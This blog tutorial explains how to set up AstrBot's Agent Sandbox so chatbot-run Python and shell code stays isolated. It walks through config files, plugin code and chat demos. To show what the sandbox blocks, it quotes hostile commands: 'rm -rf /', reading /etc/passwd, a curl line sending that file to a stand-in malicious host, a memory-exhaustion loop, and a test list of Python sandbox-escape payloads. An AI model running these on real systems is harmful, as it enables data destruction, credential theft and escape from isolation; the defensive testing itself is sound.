Skip to content

How to Use AstrBot's Agent Sandbox for Safe Code Execution

Problem

When I built an AI chatbot that could execute Python code, I quickly ran into a scary realization: what if a user asks the bot to run os.system('rm -rf /') or reads sensitive files like /etc/passwd?

I tried using Python’s built-in exec() function:

naive_executor.py
def run_user_code(code: str):
try:
exec(code)
except Exception as e:
print(f"Error: {e}")
# A user sends this through my chatbot
run_user_code("import os; os.system('cat /etc/passwd')")

This is obviously dangerous. The code runs with full privileges on my server.

Why Sandboxing Matters

The core problem with unrestricted code execution is attack surface. A malicious user could:

  • Read sensitive files (credentials, config files)
  • Delete critical data
  • Make unauthorized network requests
  • Consume all system resources (fork bombs, memory exhaustion)
  • Pivot to other parts of the infrastructure

Traditional solutions like RestrictedPython only provide partial protection. They can restrict some builtins and attributes, but determined attackers can often bypass these restrictions through various Python internals.

What I needed was true isolation - a separate environment where code runs with limited capabilities, and failures don’t affect the host system.

What is AstrBot’s Agent Sandbox?

AstrBot is an open-source chatbot framework that includes a built-in Agent Sandbox feature. The sandbox provides isolated Python and shell execution environments for AI agents.

The architecture looks like this:

Sandbox Architecture
┌─────────────────────────────────────────────────────────────┐
│ User/LLM Request │
└─────────────────────────┬───────────────────────────────────┘
┌─────────────────────────────────────────────────────────────┐
│ Security Policy Check │
│ ┌─────────────────────────────────────────────────────┐ │
│ │ - Module whitelist/blacklist │ │
│ │ - Command validation │ │
│ │ - Resource limit enforcement │ │
│ └─────────────────────────────────────────────────────┘ │
└─────────────────────────┬───────────────────────────────────┘
┌─────────────────────────────────────────────────────────────┐
│ Isolated Runtime │
│ ┌─────────────────────────────────────────────────────┐ │
│ │ - Separate process/container │ │
│ │ - Limited filesystem access │ │
│ │ - Network restrictions │ │
│ │ - Memory/CPU/time limits │ │
│ └─────────────────────────────────────────────────────┘ │
└─────────────────────────┬───────────────────────────────────┘
┌─────────────────────────────────────────────────────────────┐
│ Output Filter │
│ ┌─────────────────────────────────────────────────────┐ │
│ │ - Sanitize results │ │
│ │ - Redact sensitive information │ │
│ └─────────────────────────────────────────────────────┘ │
└─────────────────────────┬───────────────────────────────────┘
┌─────────────────────────────────────────────────────────────┐
│ Safe Result │
└─────────────────────────────────────────────────────────────┘

Key capabilities:

  • Python execution: Run Python code with restricted module access
  • Shell execution: Execute shell commands with filtering
  • Session management: Maintain state across multiple code executions
  • Resource limits: Control memory, CPU, and execution time
  • Web ChatUI integration: Access sandbox through AstrBot’s web interface

Setting Up the Sandbox

Prerequisites

  • AstrBot installed (version 3.4.0 or later)
  • Python 3.8+
  • Docker (recommended for full isolation)

Installation

First, I cloned and installed AstrBot:

terminal
git clone https://github.com/Soulter/AstrBot.git
cd AstrBot
pip install -r requirements.txt

Enabling the Agent Sandbox

In the AstrBot configuration, I enabled the sandbox feature:

config.yaml
agent_sandbox:
enabled: true
backend: "docker" # or "local" for process isolation
security_policy:
restricted_modules:
- os
- subprocess
- socket
- ctypes
- sys
memory_limit: "256m"
cpu_limit: 1
execution_timeout: 30
network_access: "restricted"
allowed_commands:
- ls
- cat
- grep
- python

The backend option determines the isolation level:

  • docker: Full container isolation (recommended)
  • local: Process-based isolation (lighter but less secure)

Executing Python Code Safely

Basic Code Execution

I created a simple plugin to execute user-provided Python code:

plugins/sandbox_executor/main.py
from astrbot.api.event import filter, AstrMessageEvent
from astrbot.api.star import Context, Star, register
@register("sandbox_executor", "author", "Safe code execution plugin", "1.0.0", "https://github.com/example")
class SandboxExecutorPlugin(Star):
@filter.command("run")
async def execute_code(self, event: AstrMessageEvent):
# Extract code from message: /run print('hello')
code = event.get_plain_text().replace("/run ", "")
# Execute in sandbox
result = await self.context.agent_sandbox.execute_python(code)
if result.get("error"):
yield event.plain_result(f"Error: {result['error']}")
elif result.get("security_violations"):
yield event.plain_result("Blocked: Security violation detected")
else:
yield event.plain_result(f"Output: {result['output']}")

When I tested with safe code:

chat
User: /run print(2 + 2)
Bot: Output: 4
User: /run [x**2 for x in range(10)]
Bot: Output: [0, 1, 4, 9, 16, 25, 36, 49, 64, 81]

Handling Security Violations

When I tried to import restricted modules:

chat
User: /run import os; os.system('whoami')
Bot: Blocked: Security violation detected

The sandbox detected the attempt to import os and blocked execution.

I also tested what happens with resource exhaustion attempts:

test_code.py
# This tries to consume all memory
x = []
while True:
x.append(' ' * 1000000)

The sandbox killed the process after hitting the memory limit:

chat
User: /run x = []\nwhile True:\n x.append(' ' * 1000000)
Bot: Error: Memory limit exceeded (256MB)

Safe Shell Command Execution

The sandbox also supports shell command execution with filtering:

plugins/shell_executor/main.py
from astrbot.api.event import filter, AstrMessageEvent
from astrbot.api.star import Context, Star, register
@register("shell_executor", "author", "Shell command plugin", "1.0.0", "https://github.com/example")
class ShellExecutorPlugin(Star):
@filter.command("shell")
async def execute_shell(self, event: AstrMessageEvent):
command = event.get_plain_text().replace("/shell ", "")
# Execute shell command in sandbox
result = await self.context.agent_sandbox.execute_shell(command)
if result.get("blocked"):
yield event.plain_result(f"Blocked: {result['reason']}")
elif result.get("error"):
yield event.plain_result(f"Error: {result['error']}")
else:
yield event.plain_result(f"Output:\n{result['output']}")

Testing with allowed commands:

chat
User: /shell ls -la
Bot: Output:
total 8
drwxr-xr-x 2 root root 4096 Mar 3 10:00 .
drwxr-xr-x 3 root root 4096 Mar 3 10:00 ..

But dangerous commands get blocked:

chat
User: /shell rm -rf /
Bot: Blocked: Command 'rm' not in allowed list
User: /shell curl http://malicious-site.com/exfil?data=$(cat /etc/passwd)
Bot: Blocked: Command 'curl' not in allowed list

Session-Level Resource Management

One powerful feature is session-based execution. This allows maintaining state across multiple code runs within a session.

Why Sessions Matter

Without sessions, each code execution starts fresh. But sometimes I need to:

  • Load a large dataset once, then query it multiple times
  • Train a model incrementally
  • Maintain variables across conversation turns

Using Sessions

plugins/session_executor/main.py
from astrbot.api.event import filter, AstrMessageEvent
from astrbot.api.star import Context, Star, register
@register("session_executor", "author", "Session-based execution", "1.0.0", "https://github.com/example")
class SessionExecutorPlugin(Star):
def __init__(self, context: Context):
super().__init__(context)
self.sessions = {} # user_id -> session_id
@filter.command("session_start")
async def start_session(self, event: AstrMessageEvent):
user_id = event.get_sender_id()
# Create a new sandbox session
session_id = await self.context.agent_sandbox.create_session(
user_id=user_id,
timeout=300, # 5 minute session
memory_limit="512m"
)
self.sessions[user_id] = session_id
yield event.plain_result(f"Session started: {session_id[:8]}...")
@filter.command("srun")
async def execute_in_session(self, event: AstrMessageEvent):
user_id = event.get_sender_id()
session_id = self.sessions.get(user_id)
if not session_id:
yield event.plain_result("No active session. Use /session_start first.")
return
code = event.get_plain_text().replace("/srun ", "")
# Execute in existing session (state persists)
result = await self.context.agent_sandbox.execute_python(
code,
session_id=session_id
)
yield event.plain_result(f"Output: {result.get('output', result.get('error'))}")
@filter.command("session_end")
async def end_session(self, event: AstrMessageEvent):
user_id = event.get_sender_id()
session_id = self.sessions.pop(user_id, None)
if session_id:
await self.context.agent_sandbox.destroy_session(session_id)
yield event.plain_result("Session ended and resources cleaned up.")
else:
yield event.plain_result("No active session to end.")

A practical example - loading and analyzing data:

chat
User: /session_start
Bot: Session started: a1b2c3d4...
User: /srun import pandas as pd
Bot: Output: None
User: /srun df = pd.read_csv('data.csv') # Pre-uploaded file
Bot: Output: None
User: /srun df.head()
Bot: Output:
id name value
0 1 Alice 100
1 2 Bob 200
2 3 Charlie 150
User: /srun df['value'].mean()
Bot: Output: 150.0
User: /session_end
Bot: Session ended and resources cleaned up.

The session kept df in memory across multiple executions.

Session Lifecycle

The session lifecycle follows this pattern:

Session Flow
┌────────────────┐
│ Create Session │ ──→ Allocate resources, assign session_id
└───────┬────────┘
┌────────────────┐
│ Execute Code │ ──→ Run in session context (state persists)
└───────┬────────┘
┌────────────────┐
│ Execute More │ ──→ Previous variables/functions available
└───────┬────────┘
┌────────────────┐
│ Destroy Session│ ──→ Clean up memory, release resources
└────────────────┘

Sessions automatically expire after the configured timeout, preventing resource leaks from abandoned sessions.

Using the Sandbox via Web ChatUI

AstrBot includes a web interface that integrates with the sandbox. After starting AstrBot with the web plugin:

terminal
python main.py --web

The web interface is available at http://localhost:6185.

In the ChatUI, I can enable agent mode which allows the AI to execute code through the sandbox. When the AI needs to run calculations or process data, it automatically uses the sandbox.

The ChatUI shows:

  • Code being executed
  • Output or errors
  • Execution time
  • Resource usage

This is useful for:

  • Quick data analysis tasks
  • Mathematical computations
  • File processing workflows

Advanced Security Configuration

Custom Module Restrictions

I can fine-tune which modules are allowed:

config.yaml
agent_sandbox:
security_policy:
# Completely block these modules
restricted_modules:
- os
- subprocess
- socket
- ctypes
- sys
- importlib
- builtins
# Allow specific functions from otherwise restricted modules
module_overrides:
os.path:
allowed: true
functions:
- join
- basename
- dirname
- exists
# Whitelist approach (more secure but restrictive)
mode: "whitelist"
allowed_modules:
- math
- json
- re
- datetime
- collections

Network Access Control

For use cases requiring network access (like web search):

config.yaml
agent_sandbox:
security_policy:
network_access: "restricted"
allowed_domains:
- "api.openai.com"
- "search.example.com"
# Block all other network requests

Resource Limits

Adjust limits based on expected workload:

config.yaml
agent_sandbox:
security_policy:
memory_limit: "512m" # Per execution
cpu_limit: 2 # Number of CPU cores
execution_timeout: 60 # Seconds
max_output_size: "10m" # Limit output size
max_file_size: "100m" # Limit file operations

Best Practices

What I Learned the Hard Way

  1. Start restrictive, then relax: Begin with a whitelist approach and add permissions as needed, rather than starting permissive and trying to tighten later.

  2. Test with real attack patterns: I created a test suite with common attack vectors:

    tests/test_sandbox_security.py
    ATTACK_VECTORS = [
    "import os; os.system('id')",
    "__import__('subprocess').call(['cat', '/etc/passwd'])",
    "exec(open('/etc/passwd').read())",
    "().__class__.__bases__[0].__subclasses__()[137]('id', shell=True).communicate()",
    ]
  3. Monitor resource usage: Even with limits, track CPU/memory trends to catch slow resource leaks.

  4. Log everything: Security events, violations, and execution patterns help identify attack attempts.

  5. Session cleanup is critical: Always implement session cleanup, especially for web applications where users might not explicitly end sessions.

Common Mistakes

  1. Relying only on module restrictions: Advanced attackers can use Python’s introspection to access blocked functionality. Always use container/process isolation as the primary defense.

  2. Ignoring timeout configuration: A complex computation might hang indefinitely without proper timeout settings.

  3. Allowing too many shell commands: Each allowed command is potential attack surface. The allowed_commands list should be minimal.

  4. Not handling errors gracefully: Exposing internal error messages can leak system information. Sanitize error output.

The Reason

The key insight is that secure code execution requires multiple layers of defense:

  1. Container/process isolation prevents direct system access
  2. Module restrictions limit what the code can import
  3. Resource limits prevent denial-of-service attacks
  4. Command filtering controls shell execution
  5. Session management prevents resource leaks

No single layer is sufficient, but together they provide strong protection.

Summary

In this post, I showed how to use AstrBot’s Agent Sandbox for secure code execution. I covered setting up the sandbox, executing Python and shell commands safely, managing sessions for stateful execution, and configuring security policies.

The key point is that sandboxing AI-generated code requires defense in depth - isolation, restrictions, limits, and monitoring all working together. AstrBot’s built-in sandbox provides these layers out of the box, making it easier to build secure AI agents.

Final Words + More Resources

My intention with this article was to help others share my knowledge and experience. If you want to contact me, you can contact by email: Email me

Here are also the most important links from this article along with some further resources that will help you in this scope:

Oh, and if you found these resources useful, don’t forget to support me by starring the repo on GitHub!

Comments